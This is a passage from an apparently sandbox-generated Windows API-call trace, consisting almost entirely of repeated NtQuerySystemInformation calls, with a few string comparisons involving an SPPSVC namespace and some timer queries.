(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x28, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x28, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x38, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x38, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd190, Length=0x20, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd190, Length=0x20, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x50, ResultLength=0x0) [0208.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0208.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e8, Length=0x50, ResultLength=0x0) [0208.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x38, ResultLength=0x0) [0208.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x28, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x38, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x38, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x20, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x38, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x20, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5f8, Length=0x50, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd570, Length=0x28, ResultLength=0x0) [0208.626] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5f8, Length=0x50, ResultLength=0x0) [0208.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5f8, Length=0x50, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x28, ResultLength=0x0) [0208.627] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd410, Length=0x38, ResultLength=0x0) [0208.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x28, ResultLength=0x0) [0208.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x28, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x28, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x28, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd410, Length=0x38, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x28, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x28, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd410, Length=0x38, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x20, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x20, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x20, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x20, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd410, Length=0x38, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x20, ResultLength=0x0) [0208.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x20, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x20, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd540 | out: lpSystemTimeAsFileTime=0xc751dfd540*(dwLowDateTime=0xdda171a0, dwHighDateTime=0x1d5fb6e)) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5f8, Length=0x50, ResultLength=0x0) [0208.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0208.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd448, Length=0x50, ResultLength=0x0) [0208.637] GetTickCount () returned 0x1174d67 [0208.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x58, ResultLength=0x0) [0208.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x28, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0208.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0208.642] NtQuerySystemInformation (SystemInformationClass=0xb9, 